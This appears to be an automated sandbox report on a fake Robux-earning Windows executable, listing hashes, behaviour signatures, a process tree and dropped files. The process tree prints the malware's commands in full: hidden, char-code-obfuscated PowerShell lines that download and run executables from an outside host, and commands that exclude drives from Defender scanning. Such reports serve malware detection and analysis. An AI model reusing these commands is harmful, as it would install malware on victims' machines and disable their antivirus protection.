Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/03/2025, 18:55

General

  • Target

    RobuxEarningV1.0.exe

  • Size

    6.8MB

  • MD5

    40e4949832835252d7c13f380a7e34e8

  • SHA1

    40413f428911437631362398426b2f2accccaefe

  • SHA256

    96a6c1b696660babb99a2de8c47464de947a11c8982277a86fb3814c6c22ada9

  • SHA512

    7160d5701d809c6b7bee228f162dab0960a6f300e0428bc3176fca508ecbcad8841b0f663164cb6f08f6db7816af93879a6c08ecc2fd0877e2db84764e018523

  • SSDEEP

    98304:4Clb/EOLQw+R0jtL0er+6HMh1igAyKl7MIEGYPkqQMcTVfrrt5pQ:4iAOw0jxNMh1xakPkmcNK

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RobuxEarningV1.0.exe
    "C:\Users\Admin\AppData\Local\Temp\RobuxEarningV1.0.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\ProgramData\-.exe
      "C:\ProgramData\-.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\ProgramData\-.exe
        "C:\ProgramData\-.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2280
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\ProgramData\SecorKit.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]104);$url+=([char]116);$url+=([char]116);$url+=([char]112);$url+=([char]115);$url+=([char]58);$url+=([char]47);$url+=([char]47);$url+=([char]102);$url+=([char]105);$url+=([char]108);$url+=([char]101);$url+=([char]115);$url+=([char]46);$url+=([char]99);$url+=([char]97);$url+=([char]116);$url+=([char]98);$url+=([char]111);$url+=([char]120);$url+=([char]46);$url+=([char]109);$url+=([char]111);$url+=([char]101);$url+=([char]47);$url+=([char]53);$url+=([char]53);$url+=([char]98);$url+=([char]117);$url+=([char]117);$url+=([char]104);$url+=([char]46);$url+=([char]115);$url+=([char]101);$url+=([char]99);$url+=([char]114);$url+=([char]111);$url+=([char]48);$url+=([char]52);$url+=([char]57);$url+=([char]48);$url+=([char]56);$url+=([char]51);$url+=([char]55);$url+=([char]53);$url+=([char]48);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]0x68);$url+=([char]0x74);$url+=([char]0x74);$url+=([char]0x70);$url+=([char]0x73);$url+=([char]0x3a);$url+=([char]0x2f);$url+=([char]0x2f);$url+=([char]0x66);$url+=([char]0x69);$url+=([char]0x6c);$url+=([char]0x65);$url+=([char]0x73);$url+=([char]0x2e);$url+=([char]0x63);$url+=([char]0x61);$url+=([char]0x74);$url+=([char]0x62);$url+=([char]0x6f);$url+=([char]0x78);$url+=([char]0x2e);$url+=([char]0x6d);$url+=([char]0x6f);$url+=([char]0x65);$url+=([char]0x2f);$url+=([char]0x35);$url+=([char]0x35);$url+=([char]0x62);$url+=([char]0x75);$url+=([char]0x75);$url+=([char]0x68);$url+=([char]0x2e);$url+=([char]0x73);$url+=([char]0x65);$url+=([char]0x63);$url+=([char]0x72);$url+=([char]0x6f);$url+=([char]0x30);$url+=([char]0x34);$url+=([char]0x39);$url+=([char]0x30);$url+=([char]0x38);$url+=([char]0x33);$url+=([char]0x37);$url+=([char]0x35);$url+=([char]0x30);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:332
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url0=''; $url0+=([char]104);$url0+=([char]116);$url0+=([char]116);$url0+=([char]112);$url0+=([char]115);$url0+=([char]58);$url0+=([char]47);$url0+=([char]47);$url0+=([char]102);$url0+=([char]105);$url0+=([char]108);$url0+=([char]101);$url0+=([char]115);$url0+=([char]46);$url0+=([char]99);$url0+=([char]97);$url0+=([char]116);$url0+=([char]98);$url0+=([char]111);$url0+=([char]120);$url0+=([char]46);$url0+=([char]109);$url0+=([char]111);$url0+=([char]101);$url0+=([char]47);$url0+=([char]99);$url0+=([char]102);$url0+=([char]117);$url0+=([char]111);$url0+=([char]105);$url0+=([char]56);$url0+=([char]46);$url0+=([char]102);$url0+=([char]117);$url0+=([char]107); $output=\"$env:PUBLIC\svhost0.exe\"; Invoke-WebRequest -Uri $url0 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url1=''; $url1+=([char]104);$url1+=([char]116);$url1+=([char]116);$url1+=([char]112);$url1+=([char]115);$url1+=([char]58);$url1+=([char]47);$url1+=([char]47);$url1+=([char]102);$url1+=([char]105);$url1+=([char]108);$url1+=([char]101);$url1+=([char]115);$url1+=([char]46);$url1+=([char]99);$url1+=([char]97);$url1+=([char]116);$url1+=([char]98);$url1+=([char]111);$url1+=([char]120);$url1+=([char]46);$url1+=([char]109);$url1+=([char]111);$url1+=([char]101);$url1+=([char]47);$url1+=([char]110);$url1+=([char]56);$url1+=([char]110);$url1+=([char]117);$url1+=([char]103);$url1+=([char]51);$url1+=([char]46);$url1+=([char]102);$url1+=([char]117);$url1+=([char]99);$url1+=([char]107); $output=\"$env:PUBLIC\svhost1.exe\"; Invoke-WebRequest -Uri $url1 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2076
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url2=''; $url2+=([char]104);$url2+=([char]116);$url2+=([char]116);$url2+=([char]112);$url2+=([char]115);$url2+=([char]58);$url2+=([char]47);$url2+=([char]47);$url2+=([char]102);$url2+=([char]105);$url2+=([char]108);$url2+=([char]101);$url2+=([char]115);$url2+=([char]46);$url2+=([char]99);$url2+=([char]97);$url2+=([char]116);$url2+=([char]98);$url2+=([char]111);$url2+=([char]120);$url2+=([char]46);$url2+=([char]109);$url2+=([char]111);$url2+=([char]101);$url2+=([char]47);$url2+=([char]104);$url2+=([char]98);$url2+=([char]108);$url2+=([char]50);$url2+=([char]105);$url2+=([char]103);$url2+=([char]46);$url2+=([char]115);$url2+=([char]101);$url2+=([char]99);$url2+=([char]114);$url2+=([char]111); $output=\"$env:PUBLIC\svhost2.exe\"; Invoke-WebRequest -Uri $url2 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c mountvol | find ":"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\system32\mountvol.exe
          mountvol
          4⤵
            PID:3028
          • C:\Windows\system32\find.exe
            find ":"
            4⤵
              PID:3040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3056
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2044
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1296
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath Possible
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:668
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath C:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2336
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath F:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1332
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath D:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1376

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\ProgramData\SecorKit.bat

        Filesize

        4KB

        MD5

        16761e8a23d0d4a636ca414cc5b15d7a

        SHA1

        9ff21e1bed5aa608f170294e800812ebe3c7fbff

        SHA256

        a52a64316c6c417abf09c36e60e2cfe492d051a5a696eeb3b1abb7c91c05734c

        SHA512

        7ebb6376ed87e1deeed99aac5c6120e9a9224aaf0a853c61e8f09709d4038a60c28899e69bdf3b2c2657633da01ac335f80bc6e5ddef0b891739ab80b4258fb8

      • C:\Users\Admin\AppData\Local\Temp\_MEI28122\python311.dll

        Filesize

        5.5MB

        MD5

        65e381a0b1bc05f71c139b0c7a5b8eb2

        SHA1

        7c4a3adf21ebcee5405288fc81fc4be75019d472

        SHA256

        53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a

        SHA512

        4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        8e7545e0cd2beac6afe4a94c06368d60

        SHA1

        284367ca3761ca5fb45b3f9c7c0e5ca5df05a0e2

        SHA256

        c4d6bf48bf4ec15a02394ea49d3352de9556c06c706c873f6def83483ac2b87e

        SHA512

        13f46d57869cbff7435964bd77a98fffafa25a1369330ab18b4624c56cabadcd4d44d4d53d443e1c936ace2abc4ddb4182ca3d96470cc6458106dbc2accfccb3

      • \ProgramData\-.exe

        Filesize

        6.8MB

        MD5

        30e2452a76d6a5c739a2b1790a269c35

        SHA1

        fb2f8ddfcf04e02effb15a2dd1a1e903871258e5

        SHA256

        30abf86701b5915651ebcbc4f1c271fe8e4d3a3627826b253ccf20c304b258d9

        SHA512

        3042b3abd47a5393fc31a3aef23a1ba26704d2e22242ec4ca9de0d2b8e71c6ad0361d7659eb58b88b1e6fae4f4459574d852e9804aeb91ed64d7b2bc931275ed

      • memory/332-44-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

        Filesize

        2.9MB

      • memory/332-45-0x00000000022B0000-0x00000000022B8000-memory.dmp

        Filesize

        32KB

      • memory/2448-0-0x000007FEF55A3000-0x000007FEF55A4000-memory.dmp

        Filesize

        4KB

      • memory/2448-1-0x00000000012F0000-0x00000000019CA000-memory.dmp

        Filesize

        6.9MB

      • memory/2880-37-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

        Filesize

        2.9MB

      • memory/2880-38-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

        Filesize

        32KB